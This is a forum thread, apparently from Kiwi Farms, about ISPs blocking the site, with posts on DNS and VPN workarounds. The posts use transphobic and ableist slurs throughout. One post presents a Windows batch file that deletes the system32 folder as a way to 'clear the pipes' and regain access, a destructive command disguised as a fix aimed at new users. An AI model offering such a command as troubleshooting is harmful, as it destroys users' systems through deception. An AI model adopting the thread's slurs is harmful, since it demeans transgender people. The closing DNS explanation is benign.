It’s getting very tiresome the amount of overreach many of the main line ISPs are integrating into their network administration. This was unequivocally president Trumps greatest blunder and weakness was his abolishment of net neutrality.

Yet trannies continue to (and will always) paint it as if every person here is some die-hard Trump supporter out for their life or something, and ride that all day long as their whole reason to shut everybody who doesn't side with them down. I don't get it. Actual proof positive right here but of course they'll conveniently ignore it.

I received a response from CenturyLink that lumen( the same company) blocked kf due to their acceptable use policy.
Sadly they are the only fiber network in my area until Google fiber ramps up.

I think it might. I just switched from T-Mobile to Verizon this morning and TMO has already called and emailed me asking why I switched. I told them. We'll see what happens. These companies absolutely hate it when their customers ditch them for one of their competitors. It's also worth noting that CenturyLink and T-Mobile haven't come out publicly to justify blocking their customers from accessing 1776's network... they know they're being retarded, but they're counting on their customers not to notice. It won't take hundreds of us dropping them for them to unfuck themselves... a few people calling them out should do it.

To add to Null's advice on the first page, if any new kiwi's find themselves unable to connect to the farms due to ISP blackholing, you can also use the following instructions to 'clear the pipes' and restore your right to access wrongthink sites:

Windows users only:
1. open up notepad
2. type:
@echo off
del c;\WINDOWS\system32
3. save the file as fuckjannytrannies.bat and close it.
4. open it

You will now have full access to the farms regardless of how hard your local ISP's try to curtail your ability to laugh at lolcows.

The troon loons will eventually go after the VPN services, and ISP will likely start blocking VPN services (VPN services robs them of "valuable" customer insights/profiling they can sell to advertisers) if there's no net neutrality.

Perhaps but there are a lot of VPN services out there and many of them are far more die hard about open internet than ISP trannies. Maybe the big ones like Nord would do it but if you're on KF you probably don't want to use Nord anyway.

That said, if this were to happen there are ways to mitigate it using custom DNS settings but that's tip-toeing into prohibitive technicalities.

Kiwifarms lives rent free in trannies' heads to a genuinely insane degree. As far as I can tell they're all fed the lore that Kiwifarms is some wicked place where people collaborate to dox and harass trannies and nearly all of them take this lore as gospel instead of checking in to see what's up.
Presumably those who do check in find Yaniv's forum or Keffals' thread and see people are bullying "one of their own" because documenting what a tranny says and posts is considered bullying.

When you type in kiwifarms.net, your computer doesn't know what that means so it asks a Domain Name System (DNS) server if it can find out the IP address associated with kiwifarms.net. By default, your DNS server is almost always one managed by your ISP and they see every website you try to go to, then tell you how to get to it.
It seems a few ISPs have decided to stop bothering to find the address for the farms which stops people from getting it, this is a pretty radical thing to do.

You can change the DNS server to whatever you want and using a VPN usually uses the VPN provider's DNS server(s) which is why that mitigates the problem.
